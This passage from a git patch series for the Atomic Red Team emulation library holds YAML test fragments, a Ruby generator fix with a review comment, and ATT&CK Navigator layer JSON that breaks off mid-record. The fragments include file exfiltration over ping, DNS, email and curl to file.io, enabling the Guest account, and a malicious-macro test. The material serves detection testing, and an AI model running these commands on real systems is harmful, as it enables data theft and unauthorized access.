@@ -71655,10 +71655,10 @@ exfiltration: dependencies: - description: 'Curl must be installed on system. -' + ' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -71674,7 +71674,7 @@ exfiltration: auto_generated_guid: 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 description: 'Exfiltrate data HTTPS using curl to file share site file.io -' + ' supported_platforms: - macos - linux @@ -71775,7 +71775,7 @@ exfiltration: auto_generated_guid: d1253f6e-c29b-49dc-b466-2147a6191932 description: 'Exfiltrates a file present on the victim machine to the C2 server. -' + ' supported_platforms: - windows input_arguments: @@ -72028,13 +72028,13 @@ exfiltration: in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) } -' + ' name: powershell - name: Exfiltration Over Alternative Protocol - DNS auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45 description: 'Exfiltration of specified file over DNS protocol. -' + ' supported_platforms: - linux executor: @@ -72079,7 +72079,7 @@ exfiltration: command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server} -' + ' name: powershell input_arguments: input_file: @@ -72482,7 +72482,7 @@ initial-access: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. -' + ' supported_platforms: - google-workspace - windows 
@@ -72517,20 +72517,20 @@ initial-access: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet -' + ' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud -' + ' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" -' + ' T1195.003: technique: external_references: @@ -72768,7 +72768,7 @@ initial-access: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default -' + ' supported_platforms: - windows input_arguments: @@ -72779,10 +72779,10 @@ initial-access: executor: command: 'net user #{guest_user} /active:yes -' + ' cleanup_command: 'net user #{guest_user} /active:no -' + ' name: command_prompt elevation_required: true T1078.002: @@ -73096,7 +73096,7 @@ initial-access: description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list -' + ' supported_platforms: - windows input_arguments: @@ -73109,12 +73109,12 @@ initial-access: type: String default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" -' + ' dependency_executor_name: powershell dependencies: - description: 'Chrome must be installed -' + ' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -73483,7 +73483,7 @@ initial-access: cleanup_command: 'Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction Ignore -' + ' - name: Word spawned a command shell and used an IP address in the command line auto_generated_guid: cbb6799a-425c-4f83-9194-5447a909d67f description: | 
@@ -73495,7 +73495,7 @@ initial-access: jse_path: description: 'Path for the macro to write out the "malicious" .jse file -' + ' type: String default: C:\Users\Public\art.jse ms_product: @@ -73506,7 +73506,7 @@ initial-access: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -73517,7 +73517,7 @@ initial-access: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -73526,7 +73526,7 @@ initial-access: Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore -' + ' name: powershell T1566.002: technique: diff --git a/bin/generate-atomic-docs.rb b/bin/generate-atomic-docs.rb index d023d67c..bee78163 100755 --- a/bin/generate-atomic-docs.rb +++ b/bin/generate-atomic-docs.rb @@ -233,7 +233,6 @@ class AtomicRedTeamDocs "techniqueID" => atomic_yaml['attack_technique'], "score" => 100, "enabled" => true, -# "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md" "links" => ["label" => "View Atomic", "url" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md"] } 
@@ -241,11 +240,30 @@ class AtomicRedTeamDocs "techniqueID" => atomic_yaml['attack_technique'].split('.')[0], "score" => 100, "enabled" => true, -# "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md" "links" => ["label" => "View Atomic", "url" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md"] } techniques.push(technique) + + for technique in techniques + if not technique['techniqueID'].include?(".") then + techniqueParent = { + "techniqueID" => atomic_yaml['attack_technique'].split('.')[0], + "score" => 100, + "enabled" => true, +# "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md" + "links" => ["label" => "View Atomics", "url" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'].split('.')[0] + "/" + atomic_yaml['attack_technique'].split('.')[0] + ".md"] + } + else + techniqueParent = { + "techniqueID" => atomic_yaml['attack_technique'].split('.')[0], + "score" => 100, + "enabled" => true +# "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md" + } + end + end + techniques.push(techniqueParent) unless techniques.include?(techniqueParent) has_windows_tests = false has_macos_tests = false From 5e043ef568da36b6400d436e6a33e70d90ed9d7f Mon Sep 17 00:00:00 2001 
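Review bot: The added `for technique in techniques` loop reuses the name of the local just pushed on the line above, and since a Ruby `for` introduces no new scope it clobbers that variable; its body never reads the loop variable except in the `if`, and both branches build `techniqueParent` from `atomic_yaml` alone, so only the final iteration survives and the branch taken depends on the last element of `techniques` rather than on the atomic being processed. The guard `techniques.push(techniqueParent) unless techniques.include?(techniqueParent)` compares whole hashes, so an entry for the same ID with a different label ("View Atomic" vs "View Atomics") or with/without `links` slips through; the regenerated layers in this same patch set show the effect, with T1609 listed twice in the containers layer and T1098 three times in the iaas layer. I would drop the loop, decide sub-technique vs top-level from `atomic_yaml['attack_technique']` itself, and dedupe on `techniqueID` as sketched below; whether the parent entry should carry a link depends on the parent directory existing, which I cannot see from here. The enclosing method begins and ends outside this hunk.
```ruby
      techniques.push(technique)

      # A sub-technique also lights up its parent; a top-level technique was
      # already pushed above, so it needs no second entry.
      parent_id = atomic_yaml['attack_technique'].split('.')[0]
      if atomic_yaml['attack_technique'].include?('.') &&
         techniques.none? { |t| t['techniqueID'] == parent_id }
        techniques.push({
          "techniqueID" => parent_id,
          "score" => 100,
          "enabled" => true
        })
      end
      # … unchanged: has_windows_tests / has_macos_tests initialisation …
```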
From: CircleCI Atomic Red Team doc generator Date: Mon, 31 Jan 2022 22:59:43 +0000 Subject: [PATCH 11/11] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-azure-ad.json | 2 +- .../art-navigator-layer-containers.json | 1 + .../art-navigator-layer-google-workspace.json | 2 +- .../art-navigator-layer-iaas.json | 2 +- .../art-navigator-layer-linux.json | 2 +- .../art-navigator-layer-macos.json | 2 +- .../art-navigator-layer-office-365.json | 1 + .../art-navigator-layer-windows.json | 1 + .../art-navigator-layer.json | 1 + atomics/Indexes/index.yaml | 4140 ++++++++--------- 10 files changed, 2079 insertions(+), 2075 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json index 8b137891..98a90907 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json 
@@ -1 +1 @@ - +{"version":"4.3","name":"Atomic Red Team (Azure-AD)","description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json index e69de29b..14962a2a 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json 
@@ -0,0 +1 @@ +{"version":"4.3","name":"Atomic Red Team (Containers)","description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json index 8b137891..7e84f69b 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json 
@@ -1 +1 @@ - +{"version":"4.3","name":"Atomic Red Team (Google-Workspace)","description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json index 8b137891..f6dd5a2c 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json 
@@ -1 +1 @@ - +{"version":"4.3","name":"Atomic Red Team (Iaas)","description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1136.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index 8b137891..97719cf8 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json 
@@ -1 +1 @@ - +{"version":"4.3","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View 
